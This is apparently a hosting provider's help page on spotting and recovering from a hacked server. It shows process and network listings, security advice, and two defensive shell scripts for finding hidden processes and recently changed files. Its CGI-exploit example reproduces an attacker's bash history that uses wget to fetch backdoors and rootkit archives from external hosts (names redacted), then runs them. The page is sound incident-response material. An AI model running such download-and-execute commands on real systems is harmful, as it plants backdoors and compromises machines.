Hacked machine

It doesn't only happen to others.

How to see that a machine is hacked?

By having a look at the MRTG traffic graph, you can't go wrong:

[MRTG traffic graph of the machine]

And on the machine, we find:

root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]

root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400


Obviously, the hacker has been able to run programs as root. The machine is therefore hacked and must be reinstalled.

# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823


There are running programs which have a PID and listening ports, yet are not shown by ps. Most likely ps has been replaced by a trojaned ps that filters out all the hacker's programs in order to trick the eye.
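The cross-check above (netstat knows PID 28823, ps does not) can be automated. The following script is an added example, not part of the original page: it parses the "PID/Program name" column of netstat -tanpu and the PID column of ps auxw and prints every PID that netstat reports but ps hides. The netstat and ps listings embedded in it are constructed samples modelled on the output above; sshd (PID 512) and the xc listener (PID 28823) are assumed values.

```shell
#!/bin/sh
# Added example (not from the original page): cross-check the PIDs that own
# sockets, as netstat -tanpu reports them, against the PIDs that ps reports.
# A PID that netstat knows but ps does not is being hidden from ps, which is
# exactly what the page observed for PID 28823 ("xc").

# netstat_pids: read "netstat -tanpu" output on stdin and print the PIDs from
# the "PID/Program name" column, one per line. Rows without a PID ("-") and
# the two header lines are skipped. $NF is used because the State column is
# empty for UDP rows, so the field count varies.
netstat_pids() {
    awk 'NR > 2 && $NF ~ /^[0-9]+\// { split($NF, a, "/"); print a[1] }' | sort -un
}

# ps_pids: read "ps auxw" output on stdin and print the PID column.
ps_pids() {
    awk 'NR > 1 { print $2 }' | sort -un
}

# hidden_pids NETSTAT_LIST PS_LIST: print every PID in the first newline
# separated list that is absent from the second.
hidden_pids() {
    printf '%s\n' "$1" | awk -v ps="$2" '
        BEGIN { n = split(ps, a, "\n"); for (i = 1; i <= n; i++) seen[a[i]] = 1 }
        NF && !($1 in seen) { print $1 }'
}

# live_check: the same comparison on the running system. It trusts netstat
# more than ps, which is still weak: a rootkit that replaces both binaries, or
# a kernel module that filters /proc, defeats it. Compare against clean static
# ps/netstat binaries from rescue media before drawing conclusions.
live_check() {
    hidden_pids "$(netstat -tanpu 2>/dev/null | netstat_pids)" "$(ps auxw | ps_pids)"
}

# Constructed sample output modelled on the page: sshd (512) is visible in both
# listings, the xc listener (28823) only appears in netstat.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      512/sshd
udp        0      0 0.0.0.0:9875            0.0.0.0:*                           28823/xc
udp        0      0 0.0.0.0:1052            0.0.0.0:*                           28823/xc
udp        0      0 0.0.0.0:53              0.0.0.0:*                           -'

SAMPLE_PS='USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root       512  0.0  0.5  1796  748 ?        S    10:51   0:00 /usr/sbin/sshd
root      3632  0.0  1.0  2368 1320 pts/0    S    10:51   0:00 -bash'

# sample_hidden: run the comparison on the constructed sample (prints 28823)
sample_hidden() {
    hidden_pids "$(printf '%s\n' "$SAMPLE_NETSTAT" | netstat_pids)" \
                "$(printf '%s\n' "$SAMPLE_PS" | ps_pids)"
}

if [ "${1:-}" = "--live" ]; then
    live_check
else
    sample_hidden
fi
```

Run without arguments to see the constructed case (it prints 28823); run with --live to compare the real netstat and ps on a machine. A PID listed means ps is lying or the process exited between the two commands, so run it twice before trusting a hit.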

# halt

Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...

The system is going down for system halt NOW !!

We immediately stop the machine.

With luck, we may only have a SemiHackedMachine.

Another example: HackedMachineExample.

Why is the machine hacked?

The causes of the problems are multiple, but they can be summed up as follows:
you are not paranoid.

You use telnet. Your login and password travel over the Internet and can be stolen at any time. You must use SSH. Here is a guide about it: SshOnDedicated.

You use FTP: your login and password travel over the Internet, and it is the same password as root. SFTP is your solution.

You use POP3/IMAP with a password, and it is the root password. Use APOP or POP3S/IMAPS. Here is a guide about it: SmtpPop3Imap.

If you don't update your server with the releases (ReleasePatch), you risk an easy hack (about 250 scans a day are carried out on our network to detect security faults).

What to do?

Once the machine is hacked, there is only one efficient solution left: to reinstall it.

The price is £90 + VAT and you restart with a freshly set up release on a new disk. If the box allows it, we put the previous disk in as secondary and mount it on /mmt (for 10 days).

Hack examples

1. CGI script fault

Symptoms

A g00dies.tgz file uploaded in /tmp along with other files: x, k, etc.
The x program is a backdoor; once launched, it gives access to the server.

We found the .bash_history of the nobody user in /tmp; here is its content:

cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth


Comments

Thanks to it, we can see that the commands were run as nobody, a user mainly used by Apache. It looks like the hacker took advantage of a vulnerability in a CGI script.

Resolution

- Kill all suspect processes that are still running.
The hacker is apparently not root (though it could actually have exploited a kernel flaw, <2.4.24);
however, we carry out some basic operations/verifications:

  • Change all passwords: root, user, mysql, mail, etc. (we can see that the hacker launched mingetty).
  • Search for files changed since the hack: find /rep -cmin -60 (lists all files whose inode status changed less than one hour ago, with /rep replaced by the directory to check).

- Then consult the Apache logs around the time of the hack to find the suspect script.
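The find check from the resolution steps, run on a constructed directory tree, as an added example that is not part of the original page. It also shows why the page's -cmin (ctime) test is a better anchor than the more obvious -mmin (mtime) test: touch can backdate a file's mtime, but ctime is set by the kernel on every inode change and cannot be chosen from user space. The file names (cgi-bin/form.cgi, tmp/x) and the 60-minute window are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original page): the "find /rep -cmin -60" check
# from the Resolution section, run on a constructed directory tree, and a
# comparison with the mtime-based variant (-mmin). An attacker can backdate a
# file's mtime with touch, but the kernel sets ctime on every inode change and
# user space cannot pick its value, so -cmin still catches the backdated file.

# make_sample_tree DIR: one legitimate CGI script and one dropped file whose
# modification time has been backdated to 2003-11-20 11:39, the date on the
# page. touch changes mtime, and that change itself bumps ctime to "now".
make_sample_tree() {
    mkdir -p "$1/cgi-bin" "$1/tmp"
    printf 'legit\n' > "$1/cgi-bin/form.cgi"
    printf 'dropped\n' > "$1/tmp/x"
    touch -t 200311201139 "$1/tmp/x"
}

# recently_changed DIR MINUTES: the page's check, files whose inode status
# changed within the last MINUTES (the -cmin test)
recently_changed() {
    find "$1" -type f -cmin "-$2" | sort
}

# recently_modified DIR MINUTES: the weaker mtime-based check
recently_modified() {
    find "$1" -type f -mmin "-$2" | sort
}

# backdated_files DIR MINUTES: files whose inode changed recently but whose
# mtime claims otherwise, i.e. candidates for a forged timestamp
backdated_files() {
    find "$1" -type f -cmin "-$2" ! -mmin "-$2" | sort
}

# demo: build the tree in a temporary directory, print the three listings and
# clean up. The functions above are what a practitioner reuses on a real /rep.
demo() {
    dir=$(mktemp -d)
    make_sample_tree "$dir"
    echo "changed (ctime) in the last 60 min:";  recently_changed "$dir" 60
    echo "modified (mtime) in the last 60 min:"; recently_modified "$dir" 60
    echo "ctime recent but mtime backdated:";    backdated_files "$dir" 60
    rm -rf "$dir"
}

demo
```

On a real machine, run the checks from a known-good find binary (rescue media) and write the listing to removable storage or another host: once root is in doubt, even the output of find on the compromised disk is suspect, which is why the page's advice is to halt and reinstall rather than clean.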